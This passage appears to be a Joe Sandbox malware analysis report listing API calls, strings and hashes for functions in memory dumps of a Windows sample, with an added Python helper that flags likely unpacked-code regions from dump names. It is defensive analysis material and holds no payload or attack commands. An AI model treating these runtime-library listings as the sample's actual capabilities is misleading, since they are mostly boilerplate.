                                                        • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction ID: e8b480bebcee50757f51981df328a8d4d35114d3a064a538f3c88eeb056bacb2
                                                        • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction Fuzzy Hash: A8215E71D05249EBDF11EBA89889BDDB7F8AF08311F144059E450B6282DB7C9944CA75
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00745728
                                                        • int.LIBCPMT ref: 0074573F
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00745748
                                                        • std::_Facet_Register.LIBCPMT ref: 00745779
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0074578F
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007457AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction ID: 5c224363ebf68ef76da8f5d7afc84f8a3d1bfdc87d8ccb810127d9e6a382d1ec
                                                        • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction Fuzzy Hash: 9D118231D00618DBCF16EBA4C849AEE7778BF44321F244969F815672D2DB7CAE058B94
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 007455EA
                                                        • int.LIBCPMT ref: 00745601
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0074560A
                                                        • std::_Facet_Register.LIBCPMT ref: 0074563B
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00745651
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074566F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction ID: a8e116a171808951d754c19852682832216ec4bcab0947d09aed117986ec2f5f
                                                        • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction Fuzzy Hash: AC11CE32800618DBCF12EBA0C849AEE7774BF44721F250519F821A72D2EB7C9E04CB96
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0074CB5F
                                                        • int.LIBCPMT ref: 0074CB76
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0074CB7F
                                                        • std::_Facet_Register.LIBCPMT ref: 0074CBB0
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0074CBC6
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074CBE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction ID: e752de0957f9a194ac3b7ac47cde6a68244a270a663709ab5b0fbb50182477cc
                                                        • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction Fuzzy Hash: 6411CE72D01218DBCF12EBA0D85AAED7774FF04321F240519F811A7292DB7C9E04CBA1
                                                        APIs
                                                        • atomic_compare_exchange.LIBCONCRT ref: 0075CE35
                                                        • atomic_compare_exchange.LIBCONCRT ref: 0075CE59
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE6A
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE78
                                                          • Part of subcall function 00741AA9: __Mtx_unlock.LIBCPMT ref: 00741AB0
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE88
                                                          • Part of subcall function 0075CB48: __Cnd_broadcast.LIBCPMT ref: 0075CB4F
                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0075CE96
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                        • String ID:
                                                        • API String ID: 4258476935-0
                                                        • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                        • Instruction ID: 5e969cd314ac6930ca9c16232ecaca5a12d66ef6f442b234faf283a536270dc1
                                                        • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                        • Instruction Fuzzy Hash: 0E01D475A00605EBDB11B760894ABDDB359AF04311F144450F8009B281EBBCAA098A91
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040993C
                                                          • Part of subcall function 00406C6B: __getptd_noexit.LIBCMT ref: 00406C6E
                                                          • Part of subcall function 00406C6B: __amsg_exit.LIBCMT ref: 00406C7B
                                                        • __getptd.LIBCMT ref: 00409953
                                                        • __amsg_exit.LIBCMT ref: 00409961
                                                        • __lock.LIBCMT ref: 00409971
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                        • String ID: zE
                                                        • API String ID: 3521780317-928493823
                                                        • Opcode ID: 900c2ce03de38fa456f20974367270b762641d4d790622020c9cfeaad1c3a30e
                                                        • Instruction ID: ca5ab9f80a99aa3500e5f97090adf092ee7ef5c1b273e0f9e419ca7a81f48ec1
                                                        • Opcode Fuzzy Hash: 900c2ce03de38fa456f20974367270b762641d4d790622020c9cfeaad1c3a30e
                                                        • Instruction Fuzzy Hash: CAF06D72900B009AD620BBBA940675A32A0AB00B18F11817FE845BB3D3CB7C9D01CB5D
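The entries above come from two different memory dumps: one at 0x740000 that is "based on PE: false", and one at 0x400000 that is "based on PE: true" and is associated with the sample's own sections. The dump file names encode why that matters. The following is an added triage helper written for this report, not Joe Sandbox code: it decodes the protection and region-type fields of an .sdmp name with the constants from winnt.h and flags regions that are executable, writable and not image-backed, which is the shape of an unpacked or injected payload. The field positions in the .sdmp name (base address, protection, region type) are an assumption inferred from the values shown in this report, and the sample dump names are copied from the entries above.

```python
"""Decode Joe Sandbox .sdmp dump names into Windows memory flags and flag
likely unpacked-code regions.

Added example for this report (not Joe Sandbox code). Assumption: in
<pid>.<state>.<id>.<base>.<protect>.<f5>.<type>.<idx>.sdmp, field 4 is the
16-hex-digit base address, field 5 the page protection and field 7 the
region type, as inferred from the names listed in the report.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection values (low byte of the protection field)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* variant
WRITE_MASK = 0xCC  # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY

# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPE = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

_SDMP_RE = re.compile(
    r"^[0-9a-f]{8}\.[0-9a-f]{8}\.\d+\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\."
    r"(?P<type>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        low = self.protect & 0xFF
        parts = [PAGE_PROTECT.get(low, f"0x{low:x}")]
        if self.protect & PAGE_GUARD:
            parts.append("PAGE_GUARD")
        return "|".join(parts)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def likely_unpacked_code(self) -> bool:
        """Executable + writable + not backed by a mapped image: the classic
        footprint of code the sample unpacked or injected at runtime."""
        return (
            bool(self.protect & EXEC_MASK)
            and bool(self.protect & WRITE_MASK)
            and self.mem_type != MEM_IMAGE
        )


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError on anything else."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return DumpRegion(name, int(m["base"], 16), int(m["protect"], 16), int(m["type"], 16))


def triage(names):
    """Return (region, verdict) pairs sorted by base address."""
    rows = []
    for n in names:
        r = parse_sdmp_name(n)
        verdict = "unpacked/injected code candidate" if r.likely_unpacked_code else "image-backed or non-executable"
        rows.append((r, verdict))
    return sorted(rows, key=lambda rv: rv[0].base)


# Dump names copied from the report entries above.
REPORT_DUMPS = [
    "00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for region, verdict in triage(REPORT_DUMPS):
        print(f"{region.base:#010x} {region.protect_name:<24} {region.type_name:<12} {verdict}")
```

Run against the four names from this report, the 0x740000 region decodes to PAGE_EXECUTE_READWRITE in MEM_PRIVATE memory and is the only candidate, while the 0x400000-0x457000 regions decode to PAGE_READONLY, PAGE_EXECUTE_READ and PAGE_READWRITE inside MEM_IMAGE, i.e. the sample's own mapped sections. That is the dump to carve a PE header out of and run through the configuration extractor; the image-backed dumps are what the on-disk file already gives you.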
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                        • Instruction ID: 67fa43efbce51fc3dba7eec40e60258cfbdb06804c5537f93657ae5d9bb96731
                                                        • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                        • Instruction Fuzzy Hash: AE51C131A00204EFDF24DF29C841A6A77F5EF59764B54856DE80EDB250E739DE10CB80
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: d1a774ea9ce6575dc428b1b71f4827ef0b1aa832da3c12ae412e337b7ef2ab28
                                                        • Instruction ID: c5602fc89b262e917f35debb7187a198d8c3f0d13576e1cd34bd2f8d56ef041a
                                                        • Opcode Fuzzy Hash: d1a774ea9ce6575dc428b1b71f4827ef0b1aa832da3c12ae412e337b7ef2ab28
                                                        • Instruction Fuzzy Hash: E641E636A00304DFDF10DF7CC884A6AB3B5EF89754B558569E909EB241DB35AD01CB80
                                                        APIs
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00745801
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745815
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0074587A
                                                        • __Getcoll.LIBCPMT ref: 00745889
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745899
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                        • String ID:
                                                        • API String ID: 1844465188-0
                                                        • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                        • Instruction ID: 8b75ffbde3d8e6b72aaf225da4234216b63747608046a63086886704982258e9
                                                        • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                        • Instruction Fuzzy Hash: 9F219F72811308EFDB51EFA4C449BDDB7B0BF40311F548459E885AB282DBBCA944CB91
                                                        APIs
                                                        • __lock.LIBCMT ref: 00406163
                                                          • Part of subcall function 0040481C: __mtinitlocknum.LIBCMT ref: 00404832
                                                          • Part of subcall function 0040481C: __amsg_exit.LIBCMT ref: 0040483E
                                                          • Part of subcall function 0040481C: EnterCriticalSection.KERNEL32(?,?,?,0040A5F5,00000004,004564E0,0000000C,00408012,74DEDFA0,?,00000000,00000000,00000000,?,00406C1D,00000001), ref: 00404846
                                                        • ___sbh_find_block.LIBCMT ref: 0040616E
                                                        • ___sbh_free_block.LIBCMT ref: 0040617D
                                                        • HeapFree.KERNEL32(00000000,74DEDFA0,00456330,0000000C,004047FD,00000000,004562F0,0000000C,00404837,74DEDFA0,?,?,0040A5F5,00000004,004564E0,0000000C), ref: 004061AD
                                                        • GetLastError.KERNEL32(?,0040A5F5,00000004,004564E0,0000000C,00408012,74DEDFA0,?,00000000,00000000,00000000,?,00406C1D,00000001,00000214), ref: 004061BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2714421763-0
                                                        • Opcode ID: 0926ccb032055abb2c659ef93006b9faa9ed87a5e4078c39cb17a2080ed973d6
                                                        • Instruction ID: 0d43752cca9b1bcde2817ab654213c7ecedecb06e1d8315643d3149bfe8e72ac
                                                        • Opcode Fuzzy Hash: 0926ccb032055abb2c659ef93006b9faa9ed87a5e4078c39cb17a2080ed973d6
                                                        • Instruction Fuzzy Hash: BB018F72900701AEEF207FB2A806B5F3A649F40768F11813FF901BA1D2DA7C8850CE5C
                                                        APIs
                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0075830A
                                                          • Part of subcall function 00761973: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0076199A
                                                          • Part of subcall function 00761973: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 007619B3
                                                          • Part of subcall function 00761973: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00761A29
                                                          • Part of subcall function 00761973: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00761A31
                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00758318
                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00758322
                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0075832C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0075834A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowVirtualWork
                                                        • String ID:
                                                        • API String ID: 2080793376-0
                                                        • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction ID: 0b03ad23a82f62d0fd531b93a3cd6c9f0dbd680916fea063aeed78d30500c074
                                                        • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction Fuzzy Hash: E1F0FC31A00218E7CA15B775D81A5FDB7255F90B52B04412AFC1163192EFEC9F0DC7C6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction ID: 5220afe54c2c4eb58e2bd6c7fe8d92cc3251fa7e029a8e69989a88eb0efc1355
                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction Fuzzy Hash: 0EF03070C00710DB8E216F14AC458053B60FF19772701526AF41A9B273DB78DA52EB9E
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: T.exe$h|aE
                                                        • API String ID: 269201875-3952841194
                                                        • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction ID: a1b2d22f84b61f2b9660824ff14b5bc291d5b4bcd980a6775ab4d14c5395a19f
                                                        • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction Fuzzy Hash: FD01DB35241B00B7CE1627345C89D2B161DEBC17F5F398138F62CB2193EE6C9D074529
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040468C), ref: 00407F24
                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                        • API String ID: 1646373207-3105848591
                                                        • Opcode ID: 34052d5efe30a951e29dc7ef0a2dbd152aac0a6d08b6cb6337df4798d7485599
                                                        • Instruction ID: 1d99bacaac1888824eefbdc766845a87ed9faa83661fb4ea910b66d5e56606b8
                                                        • Opcode Fuzzy Hash: 34052d5efe30a951e29dc7ef0a2dbd152aac0a6d08b6cb6337df4798d7485599
                                                        • Instruction Fuzzy Hash: AEF03070A44A0AD2DB005BA1FD0A76F7B79BB80742F9505A1E1D1F00E4DF7491B1D24A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_catchmake_shared
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3472968176-2084237596
                                                        • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction ID: 2b20f5923bdff95ada4fe9ee75892657e8bb087efc886f90bd521adfd48387a3
                                                        • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction Fuzzy Hash: 2BF04F70944118DFCB1ABB64C80A99C37A4BF46791F954492F8408F261C77C9D85CFA2
                                                        APIs
                                                        • ___addlocaleref.LIBCMT ref: 00409904
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(74DEDFA0), ref: 004097DC
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 004097E9
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 004097F6
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409803
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409810
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 0040982C
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 0040983C
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409852
                                                        • ___removelocaleref.LIBCMT ref: 0040990F
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(74DEDFA0), ref: 00409873
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 00409880
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 0040988D
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 0040989A
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098A7
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098C3
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098D3
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098E9
                                                        • ___freetlocinfo.LIBCMT ref: 00409923
                                                          • Part of subcall function 00409681: ___free_lconv_mon.LIBCMT ref: 004096C7
                                                          • Part of subcall function 00409681: ___free_lconv_num.LIBCMT ref: 004096E8
                                                          • Part of subcall function 00409681: ___free_lc_time.LIBCMT ref: 0040976D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                        • String ID: zE
                                                        • API String ID: 467427115-928493823
                                                        • Opcode ID: f37a897659ffcb1763ae5d7e51d1f56e1a7d4690baae62ec8f074355503619e7
                                                        • Instruction ID: 7cc856bd8639580aa16bb3a00ab6d4e201576661b31e47b60cc3ce6e324e6266
                                                        • Opcode Fuzzy Hash: f37a897659ffcb1763ae5d7e51d1f56e1a7d4690baae62ec8f074355503619e7
                                                        • Instruction Fuzzy Hash: 3BE04FB791152145CA392519654066B92988F86715F2A067FF804B73D7DB3C8C8280DD
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                        • Instruction ID: d91979ccee1b5234b9ca8d3702eb5703507e300fc0eea204f20d6c9ea3355f4b
                                                        • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                        • Instruction Fuzzy Hash: D7A15B71A00B869FDF25CF28C8917AEBBE5EF11390F18816DD58D9B24AD63C8D41C751
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
